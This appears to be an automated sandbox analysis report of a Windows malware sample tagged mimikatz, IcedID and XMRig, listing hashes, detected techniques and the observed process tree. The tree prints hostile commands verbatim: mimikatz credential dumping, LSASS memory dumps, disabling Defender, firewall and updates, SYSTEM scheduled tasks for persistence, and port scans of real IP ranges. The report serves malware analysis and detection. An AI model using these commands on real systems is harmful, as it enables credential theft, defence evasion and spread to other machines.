Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-01-2025 00:24

General

  • Target

    2025-01-02_c4443dc04a4f22f77df4c288e7b1a6ea_hacktools_icedid_mimikatz.exe

  • Size

    8.9MB

  • MD5

    c4443dc04a4f22f77df4c288e7b1a6ea

  • SHA1

    55f9d0ae4315a392002f4a826c620d79be07e899

  • SHA256

    b415e6f31856d8912385d18bbceaa423cd0c7e7bc4eabf4f35033fdb00b5f5ce

  • SHA512

    b9ee09317147a6ad3149fcf7fe5eff5ad6353b54ec84c65a764af663d31b12f82002bc295f047ff56ad2273bac8ebd9f11f4fabafc77d5378e2d01fe98279c94

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30536) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2120
      • C:\Windows\TEMP\uivtbcilg\btcbnp.exe
        "C:\Windows\TEMP\uivtbcilg\btcbnp.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1204
    • C:\Users\Admin\AppData\Local\Temp\2025-01-02_c4443dc04a4f22f77df4c288e7b1a6ea_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-01-02_c4443dc04a4f22f77df4c288e7b1a6ea_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\izcmeubg\ktlbbtb.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:808
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3348
        • C:\Windows\izcmeubg\ktlbbtb.exe
          C:\Windows\izcmeubg\ktlbbtb.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4276
    • C:\Windows\izcmeubg\ktlbbtb.exe
      C:\Windows\izcmeubg\ktlbbtb.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3992
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3544
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3640
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3692
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2416
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
          3⤵
            PID:3192
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:1676
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:1668
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2796
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\mpbivectb\iuzcjcmlt\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1768
          • C:\Windows\mpbivectb\iuzcjcmlt\wpcap.exe
            C:\Windows\mpbivectb\iuzcjcmlt\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3680
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3952
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:5116
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2080
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1572
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2444
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3980
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                  PID:1604
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1008
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:5020
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                  PID:3776
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:3724
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                  PID:2828
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3708
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4520
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\mpbivectb\iuzcjcmlt\tzmttvjbt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mpbivectb\iuzcjcmlt\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1016
                  • C:\Windows\mpbivectb\iuzcjcmlt\tzmttvjbt.exe
                    C:\Windows\mpbivectb\iuzcjcmlt\tzmttvjbt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mpbivectb\iuzcjcmlt\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:3644
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\mpbivectb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mpbivectb\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:2416
                  • C:\Windows\mpbivectb\Corporate\vfshost.exe
                    C:\Windows\mpbivectb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3360
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "linbbmwti" /ru system /tr "cmd /c C:\Windows\ime\ktlbbtb.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4888
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1868
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "linbbmwti" /ru system /tr "cmd /c C:\Windows\ime\ktlbbtb.exe"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3988
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mzlbgtmmj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4372
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1956
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "mzlbgtmmj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:4496
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "giepneiit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F"
                  2⤵
                    PID:716
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3248
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "giepneiit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:624
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2060
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4804
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2740
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2880
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4108
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4320
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:548
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2896
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1144
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1048
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3412
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2456
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:736
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2772
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                          PID:2484
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh firewall set opmode mode=disable
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1112
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:3052
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1396
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:2260
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:464
                      • C:\Windows\SysWOW64\net.exe
                        net stop MpsSvc
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4904
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                            PID:3988
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4068
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                            PID:960
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1588
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4060
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2164
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3848
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config MpsSvc start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2400
                          • C:\Windows\SysWOW64\sc.exe
                            sc config MpsSvc start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:2948
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config SharedAccess start= disabled
                          2⤵
                            PID:3828
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3248
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:3220
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4480
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                              PID:5104
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4280
                            • C:\Windows\TEMP\xohudmc.exe
                              C:\Windows\TEMP\xohudmc.exe
                              2⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of SetWindowsHookEx
                              PID:1636
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 788 C:\Windows\TEMP\mpbivectb\788.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1176
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 384 C:\Windows\TEMP\mpbivectb\384.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2560
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2120 C:\Windows\TEMP\mpbivectb\2120.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3912
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2752 C:\Windows\TEMP\mpbivectb\2752.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4384
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2780 C:\Windows\TEMP\mpbivectb\2780.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3436
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2076 C:\Windows\TEMP\mpbivectb\2076.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3644
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2204 C:\Windows\TEMP\mpbivectb\2204.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1708
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3768 C:\Windows\TEMP\mpbivectb\3768.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3640
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3864 C:\Windows\TEMP\mpbivectb\3864.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5104
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3924 C:\Windows\TEMP\mpbivectb\3924.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1804
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 4052 C:\Windows\TEMP\mpbivectb\4052.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4904
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2288 C:\Windows\TEMP\mpbivectb\2288.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1924
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 4500 C:\Windows\TEMP\mpbivectb\4500.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3896
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2232 C:\Windows\TEMP\mpbivectb\2232.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:732
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3420 C:\Windows\TEMP\mpbivectb\3420.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1420
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 2864 C:\Windows\TEMP\mpbivectb\2864.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1712
                            • C:\Windows\TEMP\mpbivectb\yubiiieib.exe
                              C:\Windows\TEMP\mpbivectb\yubiiieib.exe -accepteula -mp 3196 C:\Windows\TEMP\mpbivectb\3196.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:224
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c C:\Windows\mpbivectb\iuzcjcmlt\scan.bat
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:4268
                              • C:\Windows\mpbivectb\iuzcjcmlt\btpbguneu.exe
                                btpbguneu.exe TCP 181.215.0.1 181.215.255.255 445 512 /save
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:1224
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                              2⤵
                                PID:2844
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:2524
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                    3⤵
                                      PID:2640
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4588
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2740
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5428
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2236
                                • C:\Windows\SysWOW64\yqiwma.exe
                                  C:\Windows\SysWOW64\yqiwma.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4804
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F
                                  1⤵
                                    PID:4940
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      2⤵
                                        PID:4612
                                      • C:\Windows\system32\cacls.exe
                                        cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F
                                        2⤵
                                          PID:3948
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F
                                        1⤵
                                          PID:2552
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            2⤵
                                              PID:5080
                                            • C:\Windows\system32\cacls.exe
                                              cacls C:\Windows\TEMP\uivtbcilg\btcbnp.exe /p everyone:F
                                              2⤵
                                                PID:4968
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ktlbbtb.exe
                                              1⤵
                                                PID:2296
                                                • C:\Windows\ime\ktlbbtb.exe
                                                  C:\Windows\ime\ktlbbtb.exe
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:4264
                                              • C:\Windows\system32\cmd.EXE
                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\izcmeubg\ktlbbtb.exe /p everyone:F
                                                1⤵
                                                  PID:2692
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                    2⤵
                                                      PID:2708
